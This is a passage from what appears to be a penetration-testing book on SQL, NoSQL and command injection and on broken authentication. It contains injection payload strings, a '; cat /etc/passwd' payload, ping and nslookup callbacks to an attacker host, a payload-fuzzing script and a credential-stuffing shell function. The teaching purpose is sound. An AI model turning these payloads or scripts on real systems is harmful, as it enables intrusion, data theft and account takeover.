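Passing an argument list (e.g., `subprocess.run(["nslookup", host])`) instead of a shell string removes the interpretation step that makes this pattern exploitable.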
When attempting to identify a SQL injection vulnerability, the malicious
input we submit to the application will be in the form of SQL statements:
submitting characters that have special meaning to the SQL interpreter in
the hope that the application is not sanitizing our input and this input
is used directly in a SQL query. Comparing SQLi and command injection,
the injection points (HTTP headers, input boxes, cookies, parameter values,
etc.) may be the same, but the attack strings we submit will be different. In
addition, the way the flaw manifests itself may also be different, which makes
our job as an attacker more challenging in terms of positively identifying a
vulnerability. For example, a SQL injection flaw may raise an error that could
be displayed back to our browser (or not, in the case of blind SQL injection),
whereas a command injection flaw may only be evident by running a packet
capture to listen for traffic originating from the compromised host. The point
is that in actuality, the method we use to try and find injection may not
change drastically, but the payloads we submit and the resulting observations
we make will vary depending on the class of injection we are attempting to
identify. This will become clear when we discuss several examples.

Real-World Dialog: I was performing a penetration test on a public-facing
(on the internet) application used for providing resources for college preparatory
tests. The web application provided a search feature that I found to
be vulnerable to SQL injection. Upon discovering this flaw, I exploited it
and proceeded to dump the contents of the database. Within the dump of
data were links to tests and other publicly available content that could be
accessed by simply browsing to the website and navigating its various links.
There was no authentication, no payment processing, and no evident way
to further compromise the host in this instance. In addition, the injection
vulnerability did not allow for the ability to write to the filesystem or extract
all database/table data, and what was available for exfiltration was all
public information; the system was also isolated on a dedicated server. Due
to this, the risk associated with this finding was not ranked as significant, as
the integrity and availability of the data was not at risk and arguably the
information dumped from the database was public and therefore not confidential
in nature. The point is that while OWASP's A1 Injection category is
of particular concern, injection findings are not always high risk, and the context
of the finding has to be taken into consideration when calculating that
level of risk. Conversely, I have exploited SQL injection flaws many times to
access PCI data and gain shell access, which of course is much higher risk.
Let's talk about how to do that next.

How to Exploit: Exploiting injection vulnerabilities can be extremely easy
or exceedingly difficult. Keep in mind that in a real-world attack scenario we
may not be just attacking a web application per se; our attack traffic may be
flowing through various levels of defensive mechanisms (security controls) and
being impeded (dropped, altered) along the way. To exploit injection flaws,
we must first identify their existence. Identification of injection comes in the
form of interacting with the application by submitting malicious input and
seeing how the application responds to this input. An example of this would
be submitting the text strings test and test' into an input field and seeing
how the application responds to these two separate requests. Discerning the
Figure 2.1 Listening for traffic with tcpdump.

differences in how the application responds is our key to identifying the flaw
and will be a recurring theme for identifying other vulnerabilities later in this
book. For example, the input of test should be benign and not cause an issue,
whereas the input of test' may cause an error with the application due to
the single quote character being interpreted literally by SQL. By submitting
both of these inputs, one at a time, to the application and simply noticing
how the application responds to each input, we may be able to easily identify
a SQL injection issue. For instance, if the application's response results in a
page stating, "No results were found" when test was submitted and "There
is an error in your SQL syntax" when test' is submitted, we can deduce there
is likely an injection flaw in the application.
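This compare-the-responses step is easy to script. The sketch below flags a parameter when the single-quote probe surfaces a database error that the benign probe did not; the signature list is abridged and illustrative, as exact error strings vary by database and version:

```python
# A few well-known database error fragments (abridged, illustrative list).
SQL_ERROR_SIGNATURES = [
    "error in your SQL syntax",    # MySQL/MariaDB
    "unclosed quotation mark",     # Microsoft SQL Server
    "ORA-01756",                   # Oracle: quoted string not properly terminated
]

def responses_suggest_sqli(benign_body: str, probe_body: str) -> bool:
    # Likely injectable when the test' probe triggers a database error
    # that the plain test input did not.
    def has_error(body: str) -> bool:
        return any(sig.lower() in body.lower() for sig in SQL_ERROR_SIGNATURES)
    return has_error(probe_body) and not has_error(benign_body)

print(responses_suggest_sqli("No results were found",
                             "There is an error in your SQL syntax"))  # -> True
```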
Another thing to consider when working with injection flaws is blind injection,
meaning that there is less of an obvious indicator that the application
may be vulnerable. There are varying degrees of blindness, ranging from not
blind at all (an error message is displayed to the user when an injection attack
is submitted), to partially blind (no error messages are displayed but
discernible differences in behavior are evident), as in the case of time-based
attacks (when we inject a command telling the SQL query to wait for an
attacker-defined period of time before returning the query results), to completely
blind, where we have no real indicator that the application is vulnerable...
but it is. There are situations where blind injection (SQL, command, LDAP,
and other forms) is a logical vulnerability to test for, in which case we need to
be prepared to launch injection attacks that can still yield identifiable results
even if those results are not always evident in our browser. To do this we
need to set up a VPS accessible to the internet or otherwise accomplish the
same goal using a locally hosted machine.
VPS hosting is cheap, and we don't need significant resources for what
we are trying to accomplish; specifically, a Linux OS which we can SSH to
and have root access on will suffice. A setup with one virtual CPU, one
gigabyte of RAM, and twenty gigabytes of disk space is more than sufficient
and costs pennies to run on a per-hour basis. What we want to do is take
note of the IP address of the VPS and execute tcpdump to listen for incoming
traffic (other than our own SSH traffic) as seen in Figure 2.1. Now
when we execute our next command injection attack we can use the attack
string of ;ping 10.210.14.61, where we put in a count of pings to run and
the IP address we noted previously (likely a public-facing IP hosted in the
cloud as previously mentioned). If the application is vulnerable to command
injection via the input we attacked, we should see our VPS being pinged from
the vulnerable host. The same is true for other forms of injection. There are
caveats to this, such as if the vulnerable host is blocking outbound ICMP,
in which case using the nslookup utility will suffice (we just need to host
our own DNS and enable enhanced logging to watch for DNS lookups to
our domain). Using this concept, however, is one approach to identifying an
injection vulnerability when output or evidence of the vulnerability is not directly
returned to our browser. Ping and nslookup are not arbitrary example
commands; these two choices are excellent options as Microsoft, Linux, BSD,
and *NIX systems not only typically have these installed by default, but they
don't require a privileged account to execute. For some testing a VPS may
not be required, and our attack machine (the machine we are using to launch
attacks) can suffice instead. The actual attacks (the strings of text we submit)
do vary significantly for different forms of injection. For instance, the ping
and nslookup examples are specific to command injection across platforms,
whereas ' or 1=1; -- will work well for some SQL languages. In order to attack
with a higher degree of success, it is important to understand what the backend
processing language is, as well as the type of database being used and of
course the underlying OS used to host the vulnerable application. Knowledge
of each of these is critical for crafting a suitable attack.
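For the partially blind, time-based case mentioned above, detection reduces to comparing elapsed request times. The following sketch shows the decision logic; the payload is a common MySQL-style probe and the 80% threshold is our own choice, not a standard:

```python
# Example MySQL-style time-based probe string.
TIME_PROBE = "test' OR SLEEP(5)-- -"

def looks_time_injectable(baseline_s: float, probe_s: float,
                          injected_delay_s: float = 5.0) -> bool:
    # Flag the parameter when the probe request took roughly the full
    # injected delay longer than the benign baseline request.
    return (probe_s - baseline_s) >= (injected_delay_s * 0.8)

print(looks_time_injectable(0.3, 5.4))  # -> True
print(looks_time_injectable(0.3, 0.5))  # -> False
```

In practice we would time a benign request, time the SLEEP probe, and repeat a few times to rule out ordinary network jitter before declaring the parameter injectable.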

Examples: For this first example we will be targeting a form with three
different input fields. Visible on the page are input boxes associated with
Product, Customer, and Account Password. To first get a baseline of how the
application should normally process input and return output, we will submit
test as the input for the Product and Customer text boxes and submit the
form by clicking View, as seen in Figures 2.2 and 2.3, respectively.
Figure 2.2 Order details in our browser prior to being submitted.

The resulting page shows the query, including the rudimentary authentication
mechanism, worked and no results were returned.

Figure 2.3 Results of the previous request.

Next we will perform the same action, only substituting test with test' (note
the single quote character), and refer to Figures 2.4 and 2.5. The hope is that
we will see a different result, in effect confirming the application is dynamic
and the inputs we submit are being used to perform a query.
Figure 2.4 Input with a single quote being submitted.

Figure 2.5 Results showing a SQL error.


There is a different message being shown: "You have an error in your SQL
syntax; check the manual that...". This message is a clear indicator that the
Product and/or Customer parameters are being used in an unsanitized fashion
to execute a SQL query, and in fact the single quote character is being interpreted
literally by SQL. It is because of this that the error message is
showing (coupled with error messages being enabled). At this point we have
a level of confidence that there is a SQL injection vulnerability, which we
have successfully identified. Now we need to move on to exploiting this flaw
in a meaningful way. With SQL injection we have to understand that we
are inserting our malicious strings into an input and submitting the input, which
is then parsed by the application and used directly in a SQL query.
This means that we now have control over how the query (SQL statement)
is going to execute. What we need to determine next is what type of query
our input is being used in (SELECT, UPDATE, DELETE, etc.) as well as
where in the query the vulnerable input is being inserted. Which database
the application is querying, as well as the table(s) and column names, is also
relevant, as is the type of SQL language being employed. Oracle syntax differs
from MS SQL syntax, for example, and knowing which language is being used
will help us craft our attack in a manner for it to be successful. A typical
query apropos for this example might be "SELECT * FROM tablename
where product='$productname' and customer='$customername'". Based on
this pseudocode (query), the two parameters, "productname" and "customername",
are what we as an attacker can inject into, thus potentially changing
the results of the query. For instance, instead of submitting test' in the Product
input field, let's see what happens when we submit test' or '1'='1' -- into
the Product input box, as seen in Figure 2.6. The output shows results for all
of the products in the database of the vulnerable application. Further and
meaningful exploitation of this finding will hinge on what other data is in
the database, and while we could find this out manually, now is a fair time to introduce
a tool to help automate this attack. The tool we will be using is called
sqlmap, an open-source Python-based tool specifically written to aid
in SQL injection attacks. The best way to become familiar with the tool, in
addition to using it repeatedly in various circumstances, is by invoking it on
the command line with the -hh option to see a quick reference of its options,
as seen in Figure 2.7.

Figure 2.6 Results of SQL injection showing all product information.
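To see why the tautology works, consider a Python sketch of the server-side string concatenation, using the pseudocode query from above (the table and column names are illustrative, not taken from the real application):

```python
def build_query(productname: str, customername: str) -> str:
    # Mirrors the vulnerable pseudocode: user input is concatenated
    # directly into the SQL text with no sanitization.
    return ("SELECT * FROM tablename WHERE product='" + productname +
            "' AND customer='" + customername + "'")

# Benign input: the WHERE clause matches only rows with product 'test'.
print(build_query("test", "test"))

# Injected input: '1'='1' is always true, and the trailing comment
# marker ("-- ") removes the rest of the original WHERE clause, so
# the query returns every row in the table.
print(build_query("test' or '1'='1' -- ", "test"))
```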
Figure 2.7 sqlmap advanced help message.

Sqlmap can be used to help in the identification phase of SQL injection as
well as during the exploitation phase. Since we have already identified a
vulnerable input on the target application, we can leverage this tool to assist
with exploitation. Taking a closer look at the request being made to the
vulnerable application shows a POST request being submitted to a URL of
sqlipost.php. This is evident when using our browser to submit the request
with Burp Suite to inspect the request (note the POST payload does not
have any injection/attack string), as seen in Figure 2.8.
Figure 2.8 POST request as seen from Burp.

The advantage of using an interception proxy like Burp is clarity on
the POST payload as well as the resource/page the request is being sent
to. Oftentimes our requests may be submitted by JavaScript to a less than
obvious page or endpoint; having this visibility is very useful, coupled
with the fact we will want to use the payload as seen in Burp when submitting
our attack with sqlmap. Once again, reviewing sqlmap's options shows that
to specify POST data the --data option can be used, so our sqlmap command
to attack this application will be as described in Figure 2.9.

Figure 2.9 sqlmap command line syntax specifying POST payload via the "--data"
argument.

As expected, sqlmap is able to identify the injection vulnerability, which is
evident in the command line output from the tool, as seen in Figure 2.10.
Figure 2.10 sqlmap results showing successful identification of injection location.

In fact, sqlmap discovered that both the cn and pn parameters are vulnerable to
SQL injection; it took 205 HTTP requests to identify this, and for clarity, the
cn parameter is the name of the HTML input corresponding to Customer or
Customer Name while the pn parameter corresponds to Product Name on
the HTML form we are attacking.
To recap what has happened, we were presented with an HTML form with
several input boxes. When submitting a special character to the application
(the single quote), we noticed a SQL error message being displayed. From
there we invoked Burp to get visibility into the details of the POST payload
being sent and used this information to leverage the SQL injection tool,
sqlmap, to gain more insight into the vulnerability. But what did sqlmap
actually do? We know it sent 205 HTTP requests, and in looking at its output
we know it worked, but to answer the question of what it did, we will want
to inspect its requests with Burp. We can do this by rerunning the tool with
the --proxy option configured to send its traffic to our Burp instance (in this
case 127.0.0.1:8080). Now when we run sqlmap again, we can see exactly
the requests it is sending, and this will help us understand what the tool is
doing and how it is identifying the injection vulnerability. For the purposes of
education, it's also relevant to specify the --flush-session option for sqlmap to
start fresh instead of having sqlmap remember the successful injection points
and strings it has already found (in a real-world attack scenario this is the
opposite of what we would want to do, as it would be particularly inefficient).
Running sqlmap with the --proxy="http://127.0.0.1:8080" argument will now
allow us to leverage Burp to see exactly what sqlmap is doing. To exploit the
vulnerability once the flaw has been confirmed, sqlmap has several options
to assist with this, as we can see in Figure 2.11.

Figure 2.11 sqlmap advanced help specific to enumeration.

By specifying the --dump option we are able to dump the contents of the
database successfully, as we can see in Figure 2.12.
Figure 2.12 Output of successful data dump.

To further understand what sqlmap is doing, inspect each request it makes
using Burp (having sqlmap send its requests to Burp enables us to inspect
them) and consider spending more time with the SQL language to get
a deeper understanding of the syntax and commands.
Exploitation of NoSQL implementations is similar in nature to other injection
attacks. NoSQL databases don't structure data in the same way as
SQL databases, although the wide and varying goals and implementations of
this technology make sweeping/generalized statements less than ideal. The
data models for NoSQL databases range from relational (like SQL databases),
key-value, and column-oriented to document-oriented, as well as others. Depending
on the data model, the flexibility, performance, and scalability of a given
solution will vary; know that there are well over one hundred different types
of NoSQL databases, and while some actually are relational in design and
support SQL syntax, most do not. For our purposes as attackers, what we
need to understand is that our attack syntax will vary significantly depending
on the type of database being used by the application, but the injection
points and the way we go about injecting do not change tremendously.
One of the more popular NoSQL implementations is MongoDB, the
NoSQL database we'll exploit in this next example. The interface for the web
application is not defined by the database; thus, in this example the website
and forms look the same, and we will once again be attempting to inject
into the pn and cn POST parameters of the HTML form, just as we did
with the traditional SQL injection flaw previously discussed. The difference
will be the payloads we use and of course the back-end database technology.
At this point in the discussion about injection vulnerabilities it should be
evident that creating or otherwise obtaining a predefined list of injection
payloads is very important. Testing for injection can be manual (copying
and pasting payloads into visible inputs) but is more efficiently accomplished
using automation, where we can specify an input list of injection payloads
and leverage a tool to attempt to utilize those payloads against various inputs.
Obtaining a list of payloads/wordlists is a web search away, and for NoSQL
payloads the "$where" string will be common, as MongoDB uses an API call
allowing input (JavaScript and unserialized JSON) with the $where operator.
Akin to traditional SQL, the where operator in MongoDB is used to filter
the objects being queried to add a level of specificity.
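The same concatenation mistake looks like this with a MongoDB $where clause, where user input lands inside JavaScript that the server evaluates per document. The filter-building helper below is our own sketch; the pn field name mirrors this chapter's form parameter:

```python
import json

def build_where_filter(product: str) -> str:
    # VULNERABLE: user input is concatenated into the JavaScript that
    # MongoDB will evaluate for every document via $where.
    return json.dumps({"$where": "this.pn == '" + product + "'"})

print(build_where_filter("test"))
# Injecting || '1'=='1' makes the JavaScript condition always true,
# so the filter matches every document in the collection.
print(build_where_filter("test' || '1'=='1"))
```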
A suitable series of strings compatible with NoSQL injection should be
saved to a basic text file with one string per line, as this format will be ideal as
we import it into other tools to help with the automated attack/identification
of the flaw. A file such as what we see in Figure 2.13 will suffice for this
example. Submitting this handful of strings manually is not labor-intensive,
but for larger lists of thousands of lines/strings we would automate
this via Burp's Intruder tool, ZAP's fuzzer function, or by writing a custom
script/tool to accomplish this task (either making heavy use of wget/curl or
Python's httplib, known as http.client in Python 3). For now we can simply copy and paste one string at a
time into the inputs in the browser and proceed to submit them, as shown in
Figure 2.14.
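A custom script of the kind just mentioned can be quite small. In this sketch the endpoint URL is a placeholder (substitute whatever form action Burp shows for the real target) and the pn/cn parameter names come from this chapter's example form; it reads one payload per line and reports response sizes for triage:

```python
import urllib.parse
import urllib.request

# Placeholder endpoint; substitute the form action observed in Burp.
URL = "http://127.0.0.1/sqlipost.php"

def encode_form(payload: str) -> bytes:
    # Inject into pn while cn stays benign; rerun with roles swapped.
    return urllib.parse.urlencode({"pn": payload, "cn": "test"}).encode()

def submit_payloads(wordlist_path: str) -> None:
    # One candidate injection string per line of the wordlist file.
    with open(wordlist_path, encoding="utf-8") as fh:
        for payload in (line.rstrip("\n") for line in fh):
            try:
                body = urllib.request.urlopen(
                    URL, data=encode_form(payload), timeout=10).read()
            except OSError as exc:
                body = str(exc).encode()
            # Crude triage: responses whose size differs sharply from
            # the baseline are worth inspecting by hand (or in Burp).
            print(f"{len(body):6d} bytes  <-  {payload}")
```

Response length is only a first-pass signal; interesting outliers should still be replayed through Burp for manual inspection.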
Figure 2.13 NoSQL potential injection strings.

Figure 2.14 NoSQL injection attack strings being submitted via the HTML form.

The resulting page shows an error indicative of NoSQL injection, as we can
see in Figure 2.15.

Figure 2.15 Error message indicative of a NoSQL error.

Note once again that in a real-world scenario an evident error message is not
always present, and even when we are presented with an error, the message
may not be clear or helpful. As we have been presented with an error, we
could manually continue to exploit the application, the success of which will
hinge on our knowledge of the back-end database, the syntax, and our mastery
of the SQL (NoSQL) language. In this case it may be beneficial to once
again look to a tool to assist in the exploitation of the flaw. Akin to sqlmap,
NoSQLMap is a tool that attempts to aid in NoSQL injection attacks. It is
not as mature, reliable, or feature-rich as its namesake, but we can attempt
to use it in this scenario. To do so, we can invoke NoSQLMap via the
command line and proceed to set the required parameters before executing
the attack. We can follow Figures 2.16, 2.17, 2.18, and 2.19 for insight into
how to do this.

Figure 2.16 NoSQLMap tool's initial options.

Figure 2.17 NoSQLMap providing the options to hone our attack.

Figure 2.18 NoSQLMap executing its initial attacks on the target application.

Figure 2.19 NoSQLMap showing a successful injection and applicable vulnerable URLs.

The results of the attack can be viewed in a browser to reveal the dump of
database information, as shown in Figure 2.20.

Figure 2.20 Viewing results of NoSQLMap's successful attack in a browser.
As with traditional SQL injection, we will want to consider spending more
time with the given database technology and language to get a deeper
understanding of the syntax and commands. Doing so will help with manual
exploitation and with modifying tools to aid in successfully exploiting this type of
flaw.
Executing OS commands via a vulnerable web application is typically a
critical vulnerability, as it allows an attacker an inappropriate level
of control over the OS. To exploit command injection vulnerabilities, once
we know the OS the vulnerable application is running on, it will help if we
can leverage a list of common command injection attacks and automate the
sending of these attacks to the vulnerable application. If we do not know
what the underlying OS is, we can look to certain indicators to help identify
it, such as case sensitivity in the URI. While not 100% accurate, just by
changing an uppercase letter to a lowercase one in the URI and resubmitting
the GET request, we can sometimes identify whether the underlying OS is
Windows or not. As Windows servers are typically case-insensitive, if the
resulting page is the same versus a 404, we can come to a reasonable assumption
as to the type of OS being employed.
Other ways of identifying the OS are by examining the headers, which
will sometimes show the OS or the webserver software in use. Once again,
this is not an exact science, but there are only a few cases where an IIS server
will be running on something other than Windows. In addition, we can look
for indicators of the language being used, which can help narrow down the
OS, as well as leverage our previous reconnaissance; we do want to know
what type of OS is being used, as this will help us craft a suitable command
injection attack.
As with other forms of injection, devising a list of strings appropriate for
the OS is important for this attack; however, there will be times when we
simply don't know the OS version, and a mixed list comprised of commands
specific to differing operating systems will suffice. A suitable list for this
type of attack might include common commands such as id, ls, dir, ping,
nslookup, cat, etc., prepended and appended with command separators and
file paths, respectively; thus a complete string might be:
; cat /etc/passwd
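Assembling such a mixed list is easily scripted. In this sketch the commands and separator templates are representative choices of our own; the callback IP echoes the earlier ping example and the lookup domain is a placeholder:

```python
# Common commands worth trying across platforms; ping uses -c on
# Linux/BSD and -n on Windows, so include both forms if the OS is unknown.
commands = [
    "id", "ls", "dir",
    "ping -c 3 10.210.14.61",
    "nslookup attacker-controlled.example",
    "cat /etc/passwd",
]

# Separator/wrapper templates that various shells honor.
templates = ["; {}", "| {}", "&& {}", "`{}`", "$({})"]

payloads = [tpl.format(cmd) for cmd in commands for tpl in templates]

print(len(payloads))   # -> 30 candidate strings
print(payloads[0])     # -> "; id"
```

The resulting strings can be written one per line to a text file and fed to Burp Intruder, ZAP's fuzzer, or a custom submission script, just as with the earlier wordlists.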
Just like with SQL injection, the results of the attack may not be readily
visible in the resulting HTML displayed back to the browser, and as previously
mentioned, setting up a VPS to listen for traffic will be helpful, or otherwise
leveraging a machine to listen for callbacks.
Link to hands-on portion: https://tptgtwa.com/owasp1


Root Cause and Conclusion: The root cause of injection vulnerabilities stems from a lack of input sanitization, meaning that when a user/attacker submits input, this input is not being adequately checked for maliciousness.
OWASP A1:2017 Injection 29

The malicious input is subsequently used in a dynamic manner to either run a query, execute a command, or otherwise interact with the vulnerable system to cause harm. Identifying these flaws can be challenging, and success relies on having a solid understanding of the underlying application stack (OS, webserver, language(s), and database) and attack surface. Automated tools, when wielded properly, can greatly help with exploitation efforts.
The most common web programming languages all provide well-documented ways to address SQL injection and, as such, parameterized queries are typically available to mostly eliminate this vulnerability. For other forms of injection, special care needs to be taken to ensure the input being provided by the user is sanitized. We as penetration testers need to identify the back-end platform and devise a suitable attack based on this platform to ensure the attack strings we are submitting actually have a chance of exploiting a possible vulnerability. To that end we want to make sure our fuzzing lists are regularly updated with our own custom strings. Furthermore, we want to take special care before exploitation to not cause harm to the business, since there is considerable risk with this type of attack pertaining to the confidentiality, integrity, and availability of the systems we are attacking. Finally, knowing how to identify and exploit these flaws manually is integral for us to be able to properly configure our tools to help automate these attacks and troubleshoot the tools when they fail to work as intended.
Chapter 3

OWASP A2:2017 Broken Authentication
Definition: Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.

Details: The second most critical web application security risk is Broken Authentication, and the previous definition is provided by OWASP (as others will be in subsequent chapters). The concept of Broken Authentication encompasses many flaws that we will discuss in this chapter. Web applications utilize the HTTP protocol to communicate, which is stateless in nature. This means that every request a user/client sends to a web application is treated and understood as a new request, unaffiliated with previous requests. This inability to natively group a series of requests together has obvious shortcomings; for instance, how does a web application know who a user is? The answer is some form of session management: a means by which the application can establish an understanding that requests with a unique identifier should essentially be treated as the same user. This unique identifier is typically a cookie or token, but it doesn't have to be. Any unique string sent back and forth from the client to the server will suffice, as long as the application and client can keep track of it. Session management can be implemented in the form of a unique string in the address bar of our browser, as is the case with a Java Session ID as seen in Figure 3.1.

32 The Penetration Tester's Guide to Web Applications

Figure 3.1 Browser's address bar showing Java session ID.


Or our session can be managed via hidden form fields, as with the dated .NET ViewState coupled with an ASP.NET session ID (cookie), or via a cookie as PHP uses. When we visit a website which has a login feature and the session management is handled by a cookie, it is this unique string which will account for our session state, and understanding this will help us know how to best attack the application. Upon our first visit to a web application, the application will send a set-cookie directive and tell our browser what the value and parameters of the cookie are, such as the name of the cookie, when it expires, its scope, and what flags are enabled (Secure, HTTPOnly, and SameSite). Our browser then remembers that cookie and sends it back unmodified with every subsequent request we make; by doing so the application is able to distinguish our requests from other users' requests. Likewise, once we log in to the web application the cookie value should change (unless there is a session fixation vulnerability) and continue to be sent with every request our browser makes. This is how basic session management works, and we can see this in action by leveraging a browser and interception proxy, the output of which is seen in Figure 3.2.

Figure 3.2 HTTP response header showing cookie being set.
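A Set-Cookie response header of the kind shown in Figure 3.2 generally takes this shape (the cookie name follows the PHP convention and the value is made up for illustration):

```
Set-Cookie: PHPSESSID=f00db4be111; Path=/; Secure; HttpOnly; SameSite=Lax
```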


Using a cookie or session ID or some unique identifier is how an application handles session management; authentication, however, is the process of proving we are who we claim to be in the context of logging into the application. There are myriad ways to implement the process of authentication in an insecure fashion, and there are several options to choose from when a developer considers how to authenticate a user to an application. The most common way modern web applications authenticate a user is by leveraging what is referred to as forms-based authentication: the familiar username and password inputs on a web page which we are typically presented with as a means to log in. From an attacker's perspective, we have to appreciate what happens when a developer devises a login system and what has to be accounted for to secure it; the deeper we understand this, the better we can craft our attacks. Let's consider forms-based authentication: a web application with a form containing username and password fields (and potentially other inputs designed to challenge the user) as we can see in Figure 3.3.

Figure 3.3 Typical login form for user authentication.

What happens when a user submits this form? What back-end processing/logic is being employed to check if the values submitted by the user are valid, and how does the application handle errors, invalid input, password hashing, session management, password resets, account creation, two-factor authentication, failed login attempts, account lockouts, request throttling, IP banning, dictionary attacks, logout requests, and so forth? Creating a website that has a login form is not overly challenging, but creating a pleasant user experience while implementing sufficient security controls is extremely challenging, which is why this is the second most critical web application security risk: it's hard to do well. And to be clear, there is no standard way to implement this type of authentication, as a developer can choose to ask whatever questions they like, as well as integrate with multifactor solutions or even biometrics if desired. Conversely, the level of security being implemented using forms-based authentication can be essentially nonexistent; the approach taken when using this method is entirely nonstandard.

Real-World Dialog: One of the more interesting fails I have seen throughout my career as a penetration tester is a rather oddly implemented password reset feature on a custom application in the financial sector. The web application I was testing looked like any other modern web application, complete with common features such as the ability to create your own account, log in, change your password, access a dashboard, and so on, as well as the option to reset your password in the event that you forgot it. Study Figure 3.4 and think about how the application ought to work given this background information.

Figure 3.4 Password reset form.

Logically we might provide our username and email address, submit them, and the application will in turn check to see if the email address is valid and belongs to a user account corresponding to the username that we provide. This way, the user submitting the form has to know the username and the email address associated with that username in order to successfully issue a password reset request. Following this logic, if the username and email address are valid and associated with each other, then the application will send a password reset link to the email address associated with the account. Seems easy...
In reality, what this form did was allow a user to put in a username and ANY ARBITRARY email address the user wanted. It then checked to see if the username was that of a valid user account, and if it was, the application would send the password reset link to the email address indicated by the user (as opposed to the email address associated with the account). This was of particular concern due to the application being vulnerable to username harvesting/account enumeration. This means that I was able to confirm valid users of the application using the username harvesting flaw, reset their passwords, and receive the link to update their password in my inbox! This type of poorly calculated logic is what enables attackers to compromise accounts with ease, and something we have to think about when testing for broken authentication.

How to Exploit: Exploiting broken authentication comes in many forms. The first one we will explore is credential stuffing. OWASP, I think, has a record of sometimes coming up with less than apropos names for attacks and vulnerabilities (remember Insecure Direct Object References...), so to be clear, credential stuffing is simply using educated guesses for both the username and password fields of a web application to try to log in. Note the educated qualifier, and the fact that this attack works best when automated. Typing in and submitting credentials by hand is not efficient or necessary, as we have tools at our disposal to automate this attack. The educated component of this attack takes into account the large quantity of exposed credentials which have been made public over the years as a result of compromised web applications and their associated users' passwords. Vast lists (think hundreds of millions) of common passwords are available for us as attackers, and while username lists are available as well, the process of identifying valid usernames for an application is possible in almost all modern applications for reasons to be discussed in the username harvesting section of this book. To exploit a flaw, we typically try to identify if the flaw is present first, and in the case of a credential stuffing vulnerability, the identification of the vulnerability comes from confirming that the login page of the application allows us to submit credentials. While basic in some cases, the web application or a security device (typically a WAF) may prevent us from being successful by blocking our requests or locking out an account after a certain number of failed login attempts. We need to know our target environment; for instance, if the web application deals with credit cards, then it has to lock out user accounts after six failed login attempts for a minimum of thirty minutes in order to be PCI compliant. Also note that locking out a large quantity of valid user accounts is not always in the best interest of the business and, as such, it may be pertinent to discuss this type of attack with the business/client prior to proceeding.
This is how we succeed in a credential stuffing attack: we first obtain a list of passwords to use (Kali Linux has built-in lists in /usr/share/wordlists, for example) and a list of usernames to use (read the username harvesting sections in Chapter 12 to gather those if need be). By using valid usernames, we already have 50 percent of the required information to log in to the account, and all that is left to do is automate the process of guessing passwords. And let's be smart about this attack: if the application clearly enforces password complexity requirements for user accounts (like a minimum of 8 characters, at least one uppercase/lowercase/number/special character, etc.), then we need to modify our password input list to conform to the requirements; otherwise we are just wasting time and lacking professionalism. On this professionalism topic, also consider the sheer number of requests we will be sending for this attack and the impact this can have on the web application, infrastructure, and business (10,001 user accounts times 1,000,000 password guesses equates to over 10 billion requests), so be sure to plan accordingly. We can accomplish the automated portion of this attack by using a custom written script or an interception proxy tool such as Burp Suite. When using Burp Suite, we first prime the interface by using our browser integrated with the proxy to make a login request to the application and choose to send that (typically POST) request to Burp's Intruder feature as seen in Figure 3.5.

Figure 3.5 Burp's fuzzer (Intruder) showing a "Cluster bomb" configuration.

Burp Intruder is a fuzzing tool which we can use to automate the attack by populating the username and password parameters with the lists of usernames and passwords previously discussed. Burp Intruder will then, depending on how we configure it, proceed to try to log in to every username we provided using all one million passwords and continue to do this for each account, hence the excess of ten billion requests. For this example we will not need or want to send so many requests; also note the cluster bomb option, and utilize Burp's help section for details on the injection options available. In order to specify multiple payload positions with differing payload lists, the cluster bomb option is ideal. In this fashion we can specify the usernames and passwords we want to attempt to log in with, as seen in Figure 3.6.

Figure 3.6 Payload options for the first payload.

The first payload set (from left to right, top to bottom per the previous Positions tab in Burp) is the usernames, while the second payload set is the passwords. We can see the configuration for this in Figure 3.7. Once this attack is launched, Burp will proceed to attempt to log in with each username/password combination until it exhausts its input lists.

Figure 3.7 Payload options for the second payload.

The results of this credential stuffing attack are not evident unless we know what to look for. When a successful login occurs (our attack was able to guess the right username and password combination), the application may issue a redirect (HTTP response code 302), or the size of the response may be larger than that of failed logins. It is incumbent upon us to identify what constitutes a successful login and use this information to identify when accounts were successfully compromised.
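As a minimal alternative to Burp Intruder, this detection logic can be sketched in shell; the endpoint URL, parameter names, and the 200-vs-302 baseline below are assumptions that must be adapted to the target:

```shell
# try_logins: POST every username/password pair to a login endpoint and
# flag responses whose status code deviates from the failed-login
# baseline (e.g. a 302 redirect instead of a 200 re-render of the form).
try_logins() {
  url="$1"; users="$2"; passwords="$3"; baseline="$4"
  while read -r user; do
    while read -r pass; do
      code=$(curl -s -o /dev/null -w '%{http_code}' \
        --data-urlencode "username=$user" \
        --data-urlencode "password=$pass" "$url")
      if [ "$code" != "$baseline" ]; then
        echo "candidate: $user:$pass ($code)"
      fi
    done < "$passwords"
  done < "$users"
}
# Example (hypothetical): try_logins https://target.example/login users.txt passwords.txt 200
```

Response length is an equally useful discriminator when the application returns 200 for both outcomes; curl's `-w '%{size_download}'` can be compared against a baseline in the same way.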
Guessing passwords is not ideal, although it is an attack focused directly on the application (and indirectly on the guessability of weak passwords), and it works in many circumstances. There are, however, other ways to exploit broken authentication, such as bypassing it completely.
One such bypass technique is attempting to directly access the pages (or functions) of an application without logging in first. This method requires knowledge of the protected pages, the pages of the application which should only be accessible when logged in. For single-page applications there is less focus on the page, since there is only one, and more of a focus on the function/endpoint being called. For traditional and single-page applications, the best way to go about testing for this flaw is by leveraging our test credentials while making note of the pages or functions which are accessible once logged into an account. It is important to note the use of administrative credentials, because in this case having access to an elevated account will often yield the information required to test this functionality. Specifically, we are looking for what additional navigation links an administrator has and what additional features of the application are accessible to administrators: look for file upload capability, account management options (add, delete, modify user accounts), SQL query, VNC, log viewing, and other sensitive options only the administrator should have access to. Taking notes in this case can be as simple as copying and pasting the URL to Dradis, OneNote, Notepad++, or other applicable software we are using for keeping notes for our penetration test. It is not uncommon for certain functions or administrative options to be accessible via POST request only; thus, using Burp/ZAP at all times during this type of attack is beneficial as a source of record for HTTP requests.
